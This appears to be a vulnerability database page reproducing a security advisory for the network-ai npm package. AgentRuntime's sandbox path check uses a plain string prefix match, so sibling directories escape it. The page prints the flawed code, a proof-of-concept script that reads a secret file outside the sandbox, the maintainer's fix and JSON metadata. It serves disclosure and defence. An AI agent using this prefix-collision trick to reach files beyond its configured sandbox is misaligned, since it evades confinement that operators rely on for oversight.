GHSA-JVCM-F35G-W78P

Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42
VLAI
Summary
Network-AI: AgentRuntime sandbox path-prefix checks allow file access outside the configured base directory
Details

Summary

AgentRuntime promises scoped file access under a configured sandbox basePath, but its path containment checks use raw string prefix tests. A sandbox base such as /tmp/network-ai-sandbox also matches a sibling path such as /tmp/network-ai-sandbox_evil/secret.txt.

An agent/user that can call AgentRuntime.readFile() or AgentRuntime.listDir() can read or list files outside the intended sandbox when the target path is in a sibling directory sharing the base path prefix. This breaks the documented sandbox boundary. Confirmed in Network-AI 5.12.1. Severity: Medium, CVSS 3.1 vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N.

Details

The vulnerable containment check is in lib/agent-runtime.ts:

resolvePath(filePath: string): string | null {
  const normalized = normalize(filePath);
  const absolute = isAbsolute(normalized)
    ? normalized
    : join(this.config.basePath, normalized);
  const resolved = resolve(absolute);

  // Traversal check
  if (!resolved.startsWith(this.config.basePath)) return null;
  return resolved;
}

startsWith() is not path-boundary-aware. If this.config.basePath is /tmp/network-ai-sandbox, then /tmp/network-ai-sandbox_evil/secret.txt also starts with /tmp/network-ai-sandbox despite being outside the sandbox.

The same pattern appears in SandboxPolicy.isPathAllowed() for allowed and blocked paths. FileAccessor.read(), FileAccessor.write(), and FileAccessor.list() rely on these checks before I/O, and AgentRuntime.readFile() exposes this behavior. Reads auto-approve by default when autoApproveReads is enabled.

Affected source evidence:

  • lib/agent-runtime.ts:393-423isPathAllowed() / resolvePath() use string startsWith() containment.
  • lib/agent-runtime.ts:669-691 — file read sink relies on those checks.
  • lib/agent-runtime.ts:933-958AgentRuntime.readFile() exposes file reads.

PoC

Run from the repository root after installing dependencies:

node -r ts-node/register/transpile-only - <<'TS'
const { mkdtempSync, mkdirSync, writeFileSync, rmSync } = require('fs');
const { tmpdir } = require('os');
const { join } = require('path');
const { AgentRuntime } = require('./lib/agent-runtime');

(async () => {
  const parent = mkdtempSync(join(tmpdir(), 'network-ai-poc-'));
  const base = join(parent, 'sandbox');
  const sibling = join(parent, 'sandbox_evil');
  mkdirSync(base);
  mkdirSync(sibling);
  writeFileSync(join(sibling, 'secret.txt'), 'SECRET_OUTSIDE_SANDBOX', 'utf8');

  const runtime = new AgentRuntime({
    policy: { basePath: base, allowedPaths: ['.'], allowedCommands: [] },
  });

  const absoluteRead = await runtime.readFile(join(sibling, 'secret.txt'), 'poc-agent');
  const relativeRead = await runtime.readFile('../sandbox_evil/secret.txt', 'poc-agent');
  console.log(JSON.stringify({
    base,
    outside: join(sibling, 'secret.txt'),
    absoluteRead: { success: absoluteRead.success, content: absoluteRead.content },
    relativeRead: { success: relativeRead.success, content: relativeRead.content },
  }, null, 2));
  rmSync(parent, { recursive: true, force: true });
})();
TS

Observed result: both reads succeed and return SECRET_OUTSIDE_SANDBOX, even though the file is outside basePath.

Impact

An agent/user with access to AgentRuntime file operations can bypass the intended sandbox root and read or list files outside the sandbox when those files are located in sibling paths sharing the sandbox base path prefix. This is a sandbox boundary bypass and path traversal vulnerability. Default confirmed impact is read/list disclosure. If an embedding application uses FileAccessor.write() directly or auto-approves runtime writes, the same root cause may allow writes outside the intended sandbox to prefix-collision sibling paths. No RCE chain was confirmed.


Resolution (maintainer)

Fixed in v5.12.2 (commit a59c13a). Install: npm install network-ai@5.12.2 — published to npm with provenance.

SandboxPolicy.resolvePath() and isPathAllowed() now use separator-anchored prefix checks (resolved === base || resolved.startsWith(base + path.sep)) for both the allow-list and block-list. A sibling directory that merely shares a name prefix (e.g. /srv/app-evil vs base /srv/app) is no longer treated as in-scope.

All 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.12.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "network-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:42:29Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`AgentRuntime` promises scoped file access under a configured sandbox `basePath`, but its path containment checks use raw string prefix tests. A sandbox base such as `/tmp/network-ai-sandbox` also matches a sibling path such as `/tmp/network-ai-sandbox_evil/secret.txt`.\n\nAn agent/user that can call `AgentRuntime.readFile()` or `AgentRuntime.listDir()` can read or list files outside the intended sandbox when the target path is in a sibling directory sharing the base path prefix. This breaks the documented sandbox boundary. Confirmed in Network-AI 5.12.1. Severity: Medium, CVSS 3.1 vector `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N`.\n\n### Details\nThe vulnerable containment check is in `lib/agent-runtime.ts`:\n\n```ts\nresolvePath(filePath: string): string | null {\n  const normalized = normalize(filePath);\n  const absolute = isAbsolute(normalized)\n    ? normalized\n    : join(this.config.basePath, normalized);\n  const resolved = resolve(absolute);\n\n  // Traversal check\n  if (!resolved.startsWith(this.config.basePath)) return null;\n  return resolved;\n}\n```\n\n`startsWith()` is not path-boundary-aware. If `this.config.basePath` is `/tmp/network-ai-sandbox`, then `/tmp/network-ai-sandbox_evil/secret.txt` also starts with `/tmp/network-ai-sandbox` despite being outside the sandbox.\n\nThe same pattern appears in `SandboxPolicy.isPathAllowed()` for allowed and blocked paths. `FileAccessor.read()`, `FileAccessor.write()`, and `FileAccessor.list()` rely on these checks before I/O, and `AgentRuntime.readFile()` exposes this behavior. Reads auto-approve by default when `autoApproveReads` is enabled.\n\nAffected source evidence:\n\n- `lib/agent-runtime.ts:393-423` \u2014 `isPathAllowed()` / `resolvePath()` use string `startsWith()` containment.\n- `lib/agent-runtime.ts:669-691` \u2014 file read sink relies on those checks.\n- `lib/agent-runtime.ts:933-958` \u2014 `AgentRuntime.readFile()` exposes file reads.\n\n### PoC\nRun from the repository root after installing dependencies:\n\n```bash\nnode -r ts-node/register/transpile-only - \u003c\u003c\u0027TS\u0027\nconst { mkdtempSync, mkdirSync, writeFileSync, rmSync } = require(\u0027fs\u0027);\nconst { tmpdir } = require(\u0027os\u0027);\nconst { join } = require(\u0027path\u0027);\nconst { AgentRuntime } = require(\u0027./lib/agent-runtime\u0027);\n\n(async () =\u003e {\n  const parent = mkdtempSync(join(tmpdir(), \u0027network-ai-poc-\u0027));\n  const base = join(parent, \u0027sandbox\u0027);\n  const sibling = join(parent, \u0027sandbox_evil\u0027);\n  mkdirSync(base);\n  mkdirSync(sibling);\n  writeFileSync(join(sibling, \u0027secret.txt\u0027), \u0027SECRET_OUTSIDE_SANDBOX\u0027, \u0027utf8\u0027);\n\n  const runtime = new AgentRuntime({\n    policy: { basePath: base, allowedPaths: [\u0027.\u0027], allowedCommands: [] },\n  });\n\n  const absoluteRead = await runtime.readFile(join(sibling, \u0027secret.txt\u0027), \u0027poc-agent\u0027);\n  const relativeRead = await runtime.readFile(\u0027../sandbox_evil/secret.txt\u0027, \u0027poc-agent\u0027);\n  console.log(JSON.stringify({\n    base,\n    outside: join(sibling, \u0027secret.txt\u0027),\n    absoluteRead: { success: absoluteRead.success, content: absoluteRead.content },\n    relativeRead: { success: relativeRead.success, content: relativeRead.content },\n  }, null, 2));\n  rmSync(parent, { recursive: true, force: true });\n})();\nTS\n```\n\nObserved result: both reads succeed and return `SECRET_OUTSIDE_SANDBOX`, even though the file is outside `basePath`.\n\n### Impact\nAn agent/user with access to `AgentRuntime` file operations can bypass the intended sandbox root and read or list files outside the sandbox when those files are located in sibling paths sharing the sandbox base path prefix. This is a sandbox boundary bypass and path traversal vulnerability. Default confirmed impact is read/list disclosure. If an embedding application uses `FileAccessor.write()` directly or auto-approves runtime writes, the same root cause may allow writes outside the intended sandbox to prefix-collision sibling paths. No RCE chain was confirmed.\n\n\n---\n\n### Resolution (maintainer)\n\n**Fixed in [v5.12.2](https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2) (commit `a59c13a`).** Install: `npm install network-ai@5.12.2` \u2014 published to npm with provenance.\n\n`SandboxPolicy.resolvePath()` and `isPathAllowed()` now use separator-anchored prefix checks (`resolved === base || resolved.startsWith(base + path.sep)`) for both the allow-list and block-list. A sibling directory that merely shares a name prefix (e.g. `/srv/app-evil` vs base `/srv/app`) is no longer treated as in-scope.\n\nAll 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.",
  "id": "GHSA-jvcm-f35g-w78p",
  "modified": "2026-06-19T21:42:29Z",
  "published": "2026-06-19T21:42:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-jvcm-f35g-w78p"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/commit/a59c13a1f0ce0e8a0779a90343eef92fac5ab4c3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Jovancoding/Network-AI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Network-AI: AgentRuntime sandbox path-prefix checks allow file access outside the configured base directory"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…